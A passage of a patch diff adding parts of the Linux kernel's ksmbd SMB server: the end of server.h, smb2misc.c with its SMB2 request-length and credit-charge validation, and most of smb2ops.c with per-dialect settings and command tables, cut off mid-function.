++	unsigned int		state;
++	short			signing;
++	short			enforced_signing;
++	short			min_protocol;
++	short			max_protocol;
++	unsigned short		tcp_port;
++	unsigned short		ipc_timeout;
++	unsigned long		ipc_last_active;
++	unsigned long		deadtime;
++	unsigned int		share_fake_fscaps;
++	struct smb_sid		domain_sid;
++	unsigned int		auth_mechs;
++	unsigned int		max_connections;
++
++	char			*conf[SERVER_CONF_WORK_GROUP + 1];
++};
++
++extern struct ksmbd_server_config server_conf;
++
++int ksmbd_set_netbios_name(char *v);
++int ksmbd_set_server_string(char *v);
++int ksmbd_set_work_group(char *v);
++
++char *ksmbd_netbios_name(void);
++char *ksmbd_server_string(void);
++char *ksmbd_work_group(void);
++
++static inline int ksmbd_server_running(void)
++{
++	return READ_ONCE(server_conf.state) == SERVER_STATE_RUNNING;
++}
++
++static inline int ksmbd_server_configurable(void)
++{
++	return READ_ONCE(server_conf.state) < SERVER_STATE_RESETTING;
++}
++
++int server_queue_ctrl_init_work(void);
++int server_queue_ctrl_reset_work(void);
++#endif /* __SERVER_H__ */
+diff --git a/fs/smb/server/smb2misc.c b/fs/smb/server/smb2misc.c
+new file mode 100644
+index 0000000000000..33b7e6c4ceffb
+--- /dev/null
++++ b/fs/smb/server/smb2misc.c
+@@ -0,0 +1,454 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include "glob.h"
++#include "nterr.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "mgmt/user_session.h"
++#include "connection.h"
++
++static int check_smb2_hdr(struct smb2_hdr *hdr)
++{
++	/*
++	 * Make sure that this really is an SMB, that it is a response.
++	 */
++	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++		return 1;
++	return 0;
++}
++
++/*
++ *  The following table defines the expected "StructureSize" of SMB2 requests
++ *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
++ *
++ *  Note that commands are defined in smb2pdu.h in le16 but the array below is
++ *  indexed by command in host byte order
++ */
++static const __le16 smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ cpu_to_le16(36),
++	/* SMB2_SESSION_SETUP */ cpu_to_le16(25),
++	/* SMB2_LOGOFF */ cpu_to_le16(4),
++	/* SMB2_TREE_CONNECT */ cpu_to_le16(9),
++	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
++	/* SMB2_CREATE */ cpu_to_le16(57),
++	/* SMB2_CLOSE */ cpu_to_le16(24),
++	/* SMB2_FLUSH */ cpu_to_le16(24),
++	/* SMB2_READ */ cpu_to_le16(49),
++	/* SMB2_WRITE */ cpu_to_le16(49),
++	/* SMB2_LOCK */ cpu_to_le16(48),
++	/* SMB2_IOCTL */ cpu_to_le16(57),
++	/* SMB2_CANCEL */ cpu_to_le16(4),
++	/* SMB2_ECHO */ cpu_to_le16(4),
++	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(33),
++	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(32),
++	/* SMB2_QUERY_INFO */ cpu_to_le16(41),
++	/* SMB2_SET_INFO */ cpu_to_le16(33),
++	/* use 44 for lease break */
++	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(36)
++};
++
++/*
++ * The size of the variable area depends on the offset and length fields
++ * located in different fields for various SMB2 requests. SMB2 requests
++ * with no variable length info, show an offset of zero for the offset field.
++ */
++static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ true,
++	/* SMB2_SESSION_SETUP */ true,
++	/* SMB2_LOGOFF */ false,
++	/* SMB2_TREE_CONNECT */	true,
++	/* SMB2_TREE_DISCONNECT */ false,
++	/* SMB2_CREATE */ true,
++	/* SMB2_CLOSE */ false,
++	/* SMB2_FLUSH */ false,
++	/* SMB2_READ */	true,
++	/* SMB2_WRITE */ true,
++	/* SMB2_LOCK */	true,
++	/* SMB2_IOCTL */ true,
++	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
++	/* SMB2_ECHO */ false,
++	/* SMB2_QUERY_DIRECTORY */ true,
++	/* SMB2_CHANGE_NOTIFY */ false,
++	/* SMB2_QUERY_INFO */ true,
++	/* SMB2_SET_INFO */ true,
++	/* SMB2_OPLOCK_BREAK */ false
++};
++
++/*
++ * Set length of the data area and the offset to arguments.
++ * if they are invalid, return error.
++ */
++static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
++				  struct smb2_hdr *hdr)
++{
++	int ret = 0;
++
++	*off = 0;
++	*len = 0;
++
++	/*
++	 * Following commands have data areas so we have to get the location
++	 * of the data buffer offset and data buffer length for the particular
++	 * command.
++	 */
++	switch (hdr->Command) {
++	case SMB2_SESSION_SETUP:
++		*off = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferOffset);
++		*len = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferLength);
++		break;
++	case SMB2_TREE_CONNECT:
++		*off = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathOffset);
++		*len = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathLength);
++		break;
++	case SMB2_CREATE:
++	{
++		if (((struct smb2_create_req *)hdr)->CreateContextsLength) {
++			*off = le32_to_cpu(((struct smb2_create_req *)
++				hdr)->CreateContextsOffset);
++			*len = le32_to_cpu(((struct smb2_create_req *)
++				hdr)->CreateContextsLength);
++			break;
++		}
++
++		*off = le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
++		*len = le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
++		break;
++	}
++	case SMB2_QUERY_INFO:
++		*off = le16_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferOffset);
++		*len = le32_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferLength);
++		break;
++	case SMB2_SET_INFO:
++		*off = le16_to_cpu(((struct smb2_set_info_req *)hdr)->BufferOffset);
++		*len = le32_to_cpu(((struct smb2_set_info_req *)hdr)->BufferLength);
++		break;
++	case SMB2_READ:
++		*off = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoOffset);
++		*len = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoLength);
++		break;
++	case SMB2_WRITE:
++		if (((struct smb2_write_req *)hdr)->DataOffset ||
++		    ((struct smb2_write_req *)hdr)->Length) {
++			*off = max_t(unsigned int,
++				     le16_to_cpu(((struct smb2_write_req *)hdr)->DataOffset),
++				     offsetof(struct smb2_write_req, Buffer));
++			*len = le32_to_cpu(((struct smb2_write_req *)hdr)->Length);
++			break;
++		}
++
++		*off = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoOffset);
++		*len = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoLength);
++		break;
++	case SMB2_QUERY_DIRECTORY:
++		*off = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameOffset);
++		*len = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameLength);
++		break;
++	case SMB2_LOCK:
++	{
++		unsigned short lock_count;
++
++		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
++		if (lock_count > 0) {
++			*off = offsetof(struct smb2_lock_req, locks);
++			*len = sizeof(struct smb2_lock_element) * lock_count;
++		}
++		break;
++	}
++	case SMB2_IOCTL:
++		*off = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputOffset);
++		*len = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputCount);
++		break;
++	default:
++		ksmbd_debug(SMB, "no length check for command\n");
++		break;
++	}
++
++	if (*off > 4096) {
++		ksmbd_debug(SMB, "offset %d too large\n", *off);
++		ret = -EINVAL;
++	} else if ((u64)*off + *len > MAX_STREAM_PROT_LEN) {
++		ksmbd_debug(SMB, "Request is larger than maximum stream protocol length(%u): %llu\n",
++			    MAX_STREAM_PROT_LEN, (u64)*off + *len);
++		ret = -EINVAL;
++	}
++
++	return ret;
++}
++
++/*
++ * Calculate the size of the SMB message based on the fixed header
++ * portion, the number of word parameters and the data portion of the message.
++ */
++static int smb2_calc_size(void *buf, unsigned int *len)
++{
++	struct smb2_pdu *pdu = (struct smb2_pdu *)buf;
++	struct smb2_hdr *hdr = &pdu->hdr;
++	unsigned int offset; /* the offset from the beginning of SMB to data area */
++	unsigned int data_length; /* the length of the variable length data area */
++	int ret;
++
++	/* Structure Size has already been checked to make sure it is 64 */
++	*len = le16_to_cpu(hdr->StructureSize);
++
++	/*
++	 * StructureSize2, ie length of fixed parameter area has already
++	 * been checked to make sure it is the correct length.
++	 */
++	*len += le16_to_cpu(pdu->StructureSize2);
++	/*
++	 * StructureSize2 of smb2_lock pdu is set to 48, indicating
++	 * the size of smb2 lock request with single smb2_lock_element
++	 * regardless of number of locks. Subtract single
++	 * smb2_lock_element for correct buffer size check.
++	 */
++	if (hdr->Command == SMB2_LOCK)
++		*len -= sizeof(struct smb2_lock_element);
++
++	if (has_smb2_data_area[le16_to_cpu(hdr->Command)] == false)
++		goto calc_size_exit;
++
++	ret = smb2_get_data_area_len(&offset, &data_length, hdr);
++	if (ret)
++		return ret;
++	ksmbd_debug(SMB, "SMB2 data length %u offset %u\n", data_length,
++		    offset);
++
++	if (data_length > 0) {
++		/*
++		 * Check to make sure that data area begins after fixed area,
++		 * Note that last byte of the fixed area is part of data area
++		 * for some commands, typically those with odd StructureSize,
++		 * so we must add one to the calculation.
++		 */
++		if (offset + 1 < *len) {
++			ksmbd_debug(SMB,
++				    "data area offset %d overlaps SMB2 header %u\n",
++				    offset + 1, *len);
++			return -EINVAL;
++		}
++
++		*len = offset + data_length;
++	}
++
++calc_size_exit:
++	ksmbd_debug(SMB, "SMB2 len %u\n", *len);
++	return 0;
++}
++
++static inline int smb2_query_info_req_len(struct smb2_query_info_req *h)
++{
++	return le32_to_cpu(h->InputBufferLength) +
++		le32_to_cpu(h->OutputBufferLength);
++}
++
++static inline int smb2_set_info_req_len(struct smb2_set_info_req *h)
++{
++	return le32_to_cpu(h->BufferLength);
++}
++
++static inline int smb2_read_req_len(struct smb2_read_req *h)
++{
++	return le32_to_cpu(h->Length);
++}
++
++static inline int smb2_write_req_len(struct smb2_write_req *h)
++{
++	return le32_to_cpu(h->Length);
++}
++
++static inline int smb2_query_dir_req_len(struct smb2_query_directory_req *h)
++{
++	return le32_to_cpu(h->OutputBufferLength);
++}
++
++static inline int smb2_ioctl_req_len(struct smb2_ioctl_req *h)
++{
++	return le32_to_cpu(h->InputCount) +
++		le32_to_cpu(h->OutputCount);
++}
++
++static inline int smb2_ioctl_resp_len(struct smb2_ioctl_req *h)
++{
++	return le32_to_cpu(h->MaxInputResponse) +
++		le32_to_cpu(h->MaxOutputResponse);
++}
++
++static int smb2_validate_credit_charge(struct ksmbd_conn *conn,
++				       struct smb2_hdr *hdr)
++{
++	unsigned int req_len = 0, expect_resp_len = 0, calc_credit_num, max_len;
++	unsigned short credit_charge = le16_to_cpu(hdr->CreditCharge);
++	void *__hdr = hdr;
++	int ret = 0;
++
++	switch (hdr->Command) {
++	case SMB2_QUERY_INFO:
++		req_len = smb2_query_info_req_len(__hdr);
++		break;
++	case SMB2_SET_INFO:
++		req_len = smb2_set_info_req_len(__hdr);
++		break;
++	case SMB2_READ:
++		req_len = smb2_read_req_len(__hdr);
++		break;
++	case SMB2_WRITE:
++		req_len = smb2_write_req_len(__hdr);
++		break;
++	case SMB2_QUERY_DIRECTORY:
++		req_len = smb2_query_dir_req_len(__hdr);
++		break;
++	case SMB2_IOCTL:
++		req_len = smb2_ioctl_req_len(__hdr);
++		expect_resp_len = smb2_ioctl_resp_len(__hdr);
++		break;
++	case SMB2_CANCEL:
++		return 0;
++	default:
++		req_len = 1;
++		break;
++	}
++
++	credit_charge = max_t(unsigned short, credit_charge, 1);
++	max_len = max_t(unsigned int, req_len, expect_resp_len);
++	calc_credit_num = DIV_ROUND_UP(max_len, SMB2_MAX_BUFFER_SIZE);
++
++	if (credit_charge < calc_credit_num) {
++		ksmbd_debug(SMB, "Insufficient credit charge, given: %d, needed: %d\n",
++			    credit_charge, calc_credit_num);
++		return 1;
++	} else if (credit_charge > conn->vals->max_credits) {
++		ksmbd_debug(SMB, "Too large credit charge: %d\n", credit_charge);
++		return 1;
++	}
++
++	spin_lock(&conn->credits_lock);
++	if (credit_charge > conn->total_credits) {
++		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
++			    credit_charge, conn->total_credits);
++		ret = 1;
++	}
++
++	if ((u64)conn->outstanding_credits + credit_charge > conn->total_credits) {
++		ksmbd_debug(SMB, "Limits exceeding the maximum allowable outstanding requests, given : %u, pending : %u\n",
++			    credit_charge, conn->outstanding_credits);
++		ret = 1;
++	} else
++		conn->outstanding_credits += credit_charge;
++
++	spin_unlock(&conn->credits_lock);
++
++	return ret;
++}
++
++int ksmbd_smb2_check_message(struct ksmbd_work *work)
++{
++	struct smb2_pdu *pdu = ksmbd_req_buf_next(work);
++	struct smb2_hdr *hdr = &pdu->hdr;
++	int command;
++	__u32 clc_len;  /* calculated length */
++	__u32 len = get_rfc1002_len(work->request_buf);
++	__u32 req_struct_size, next_cmd = le32_to_cpu(hdr->NextCommand);
++
++	if ((u64)work->next_smb2_rcv_hdr_off + next_cmd > len) {
++		pr_err("next command(%u) offset exceeds smb msg size\n",
++				next_cmd);
++		return 1;
++	}
++
++	if (next_cmd > 0)
++		len = next_cmd;
++	else if (work->next_smb2_rcv_hdr_off)
++		len -= work->next_smb2_rcv_hdr_off;
++
++	if (check_smb2_hdr(hdr))
++		return 1;
++
++	if (hdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
++		ksmbd_debug(SMB, "Illegal structure size %u\n",
++			    le16_to_cpu(hdr->StructureSize));
++		return 1;
++	}
++
++	command = le16_to_cpu(hdr->Command);
++	if (command >= NUMBER_OF_SMB2_COMMANDS) {
++		ksmbd_debug(SMB, "Illegal SMB2 command %d\n", command);
++		return 1;
++	}
++
++	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
++		if (command == SMB2_OPLOCK_BREAK_HE &&
++		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_20 &&
++		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_21) {
++			/* special case for SMB2.1 lease break message */
++			ksmbd_debug(SMB,
++				    "Illegal request size %d for oplock break\n",
++				    le16_to_cpu(pdu->StructureSize2));
++			return 1;
++		}
++	}
++
++	req_struct_size = le16_to_cpu(pdu->StructureSize2) +
++		__SMB2_HEADER_STRUCTURE_SIZE;
++	if (command == SMB2_LOCK_HE)
++		req_struct_size -= sizeof(struct smb2_lock_element);
++
++	if (req_struct_size > len + 1)
++		return 1;
++
++	if (smb2_calc_size(hdr, &clc_len))
++		return 1;
++
++	if (len != clc_len) {
++		/* client can return one byte more due to implied bcc[0] */
++		if (clc_len == len + 1)
++			goto validate_credit;
++
++		/*
++		 * Some windows servers (win2016) will pad also the final
++		 * PDU in a compound to 8 bytes.
++		 */
++		if (ALIGN(clc_len, 8) == len)
++			goto validate_credit;
++
++		/*
++		 * SMB2 NEGOTIATE request will be validated when message
++		 * handling proceeds.
++		 */
++		if (command == SMB2_NEGOTIATE_HE)
++			goto validate_credit;
++
++		/*
++		 * Allow a message that padded to 8byte boundary.
++		 * Linux 4.19.217 with smb 3.0.2 are sometimes
++		 * sending messages where the cls_len is exactly
++		 * 8 bytes less than len.
++		 */
++		if (clc_len < len && (len - clc_len) <= 8)
++			goto validate_credit;
++
++		pr_err_ratelimited(
++			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
++			    len, clc_len, command,
++			    le64_to_cpu(hdr->MessageId));
++
++		return 1;
++	}
++
++validate_credit:
++	if ((work->conn->vals->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU) &&
++	    smb2_validate_credit_charge(work->conn, hdr)) {
++		work->conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
++		return 1;
++	}
++
++	return 0;
++}
++
++int smb2_negotiate_request(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB2_NEGOTIATE_HE);
++}
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
+new file mode 100644
+index 0000000000000..ab23da2120b94
+--- /dev/null
++++ b/fs/smb/server/smb2ops.c
+@@ -0,0 +1,314 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/slab.h>
++#include "glob.h"
++
++#include "auth.h"
++#include "connection.h"
++#include "smb_common.h"
++#include "server.h"
++
++static struct smb_version_values smb21_server_values = {
++	.version_string = SMB21_VERSION_STRING,
++	.protocol_id = SMB21_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB21_DEFAULT_IOSIZE,
++	.max_write_size = SMB21_DEFAULT_IOSIZE,
++	.max_trans_size = SMB21_DEFAULT_IOSIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_values smb30_server_values = {
++	.version_string = SMB30_VERSION_STRING,
++	.protocol_id = SMB30_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB3_DEFAULT_IOSIZE,
++	.max_write_size = SMB3_DEFAULT_IOSIZE,
++	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease_v2),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_values smb302_server_values = {
++	.version_string = SMB302_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB3_DEFAULT_IOSIZE,
++	.max_write_size = SMB3_DEFAULT_IOSIZE,
++	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease_v2),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_values smb311_server_values = {
++	.version_string = SMB311_VERSION_STRING,
++	.protocol_id = SMB311_PROT_ID,
++	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
++	.max_read_size = SMB3_DEFAULT_IOSIZE,
++	.max_write_size = SMB3_DEFAULT_IOSIZE,
++	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
++	.max_credits = SMB2_MAX_CREDITS,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.create_lease_size = sizeof(struct create_lease_v2),
++	.create_durable_size = sizeof(struct create_durable_rsp),
++	.create_durable_v2_size = sizeof(struct create_durable_v2_rsp),
++	.create_mxac_size = sizeof(struct create_mxac_rsp),
++	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
++	.create_posix_size = sizeof(struct create_posix_rsp),
++};
++
++static struct smb_version_ops smb2_0_server_ops = {
++	.get_cmd_val		=	get_smb2_cmd_val,
++	.init_rsp_hdr		=	init_smb2_rsp_hdr,
++	.set_rsp_status		=	set_smb2_rsp_status,
++	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
++	.set_rsp_credits	=	smb2_set_rsp_credits,
++	.check_user_session	=	smb2_check_user_session,
++	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
++	.is_sign_req		=	smb2_is_sign_req,
++	.check_sign_req		=	smb2_check_sign_req,
++	.set_sign_rsp		=	smb2_set_sign_rsp
++};
++
++static struct smb_version_ops smb3_0_server_ops = {
++	.get_cmd_val		=	get_smb2_cmd_val,
++	.init_rsp_hdr		=	init_smb2_rsp_hdr,
++	.set_rsp_status		=	set_smb2_rsp_status,
++	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
++	.set_rsp_credits	=	smb2_set_rsp_credits,
++	.check_user_session	=	smb2_check_user_session,
++	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
++	.is_sign_req		=	smb2_is_sign_req,
++	.check_sign_req		=	smb3_check_sign_req,
++	.set_sign_rsp		=	smb3_set_sign_rsp,
++	.generate_signingkey	=	ksmbd_gen_smb30_signingkey,
++	.generate_encryptionkey	=	ksmbd_gen_smb30_encryptionkey,
++	.is_transform_hdr	=	smb3_is_transform_hdr,
++	.decrypt_req		=	smb3_decrypt_req,
++	.encrypt_resp		=	smb3_encrypt_resp
++};
++
++static struct smb_version_ops smb3_11_server_ops = {
++	.get_cmd_val		=	get_smb2_cmd_val,
++	.init_rsp_hdr		=	init_smb2_rsp_hdr,
++	.set_rsp_status		=	set_smb2_rsp_status,
++	.allocate_rsp_buf       =       smb2_allocate_rsp_buf,
++	.set_rsp_credits	=	smb2_set_rsp_credits,
++	.check_user_session	=	smb2_check_user_session,
++	.get_ksmbd_tcon		=	smb2_get_ksmbd_tcon,
++	.is_sign_req		=	smb2_is_sign_req,
++	.check_sign_req		=	smb3_check_sign_req,
++	.set_sign_rsp		=	smb3_set_sign_rsp,
++	.generate_signingkey	=	ksmbd_gen_smb311_signingkey,
++	.generate_encryptionkey	=	ksmbd_gen_smb311_encryptionkey,
++	.is_transform_hdr	=	smb3_is_transform_hdr,
++	.decrypt_req		=	smb3_decrypt_req,
++	.encrypt_resp		=	smb3_encrypt_resp
++};
++
++static struct smb_version_cmds smb2_0_server_cmds[NUMBER_OF_SMB2_COMMANDS] = {
++	[SMB2_NEGOTIATE_HE]	=	{ .proc = smb2_negotiate_request, },
++	[SMB2_SESSION_SETUP_HE] =	{ .proc = smb2_sess_setup, },
++	[SMB2_TREE_CONNECT_HE]  =	{ .proc = smb2_tree_connect,},
++	[SMB2_TREE_DISCONNECT_HE]  =	{ .proc = smb2_tree_disconnect,},
++	[SMB2_LOGOFF_HE]	=	{ .proc = smb2_session_logoff,},
++	[SMB2_CREATE_HE]	=	{ .proc = smb2_open},
++	[SMB2_QUERY_INFO_HE]	=	{ .proc = smb2_query_info},
++	[SMB2_QUERY_DIRECTORY_HE] =	{ .proc = smb2_query_dir},
++	[SMB2_CLOSE_HE]		=	{ .proc = smb2_close},
++	[SMB2_ECHO_HE]		=	{ .proc = smb2_echo},
++	[SMB2_SET_INFO_HE]      =       { .proc = smb2_set_info},
++	[SMB2_READ_HE]		=	{ .proc = smb2_read},
++	[SMB2_WRITE_HE]		=	{ .proc = smb2_write},
++	[SMB2_FLUSH_HE]		=	{ .proc = smb2_flush},
++	[SMB2_CANCEL_HE]	=	{ .proc = smb2_cancel},
++	[SMB2_LOCK_HE]		=	{ .proc = smb2_lock},
++	[SMB2_IOCTL_HE]		=	{ .proc = smb2_ioctl},
++	[SMB2_OPLOCK_BREAK_HE]	=	{ .proc = smb2_oplock_break},
++	[SMB2_CHANGE_NOTIFY_HE]	=	{ .proc = smb2_notify},
++};
++
++/**
++ * init_smb2_1_server() - initialize a smb server connection with smb2.1
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++void init_smb2_1_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb21_server_values;
++	conn->ops = &smb2_0_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_HMAC_SHA256_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++}
++
++/**
++ * init_smb3_0_server() - initialize a smb server connection with smb3.0
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++void init_smb3_0_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb30_server_values;
++	conn->ops = &smb3_0_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
++	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
++}
++
++/**
++ * init_smb3_02_server() - initialize a smb server connection with smb3.02
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++void init_smb3_02_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb302_server_values;
++	conn->ops = &smb3_0_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION &&
++	    conn->cli_cap & SMB2_GLOBAL_CAP_ENCRYPTION)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
++}
++
++/**
++ * init_smb3_11_server() - initialize a smb server connection with smb3.11
++ *			command dispatcher
++ * @conn:	connection instance
++ */
++int init_smb3_11_server(struct ksmbd_conn *conn)
++{
++	conn->vals = &smb311_server_values;
++	conn->ops = &smb3_11_server_ops;
++	conn->cmds = smb2_0_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb2_0_server_cmds);
++	conn->signing_algorithm = SIGNING_ALG_AES_CMAC_LE;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_LEASES)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_LEASING;
++
++	if (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL)
++		conn->vals->capabilities |= SMB2_GLOBAL_CAP_MULTI_CHANNEL;
++
++	INIT_LIST_HEAD(&conn->preauth_sess_table);
++	return 0;
++}
++
++void init_smb2_max_read_size(unsigned int sz)
++{
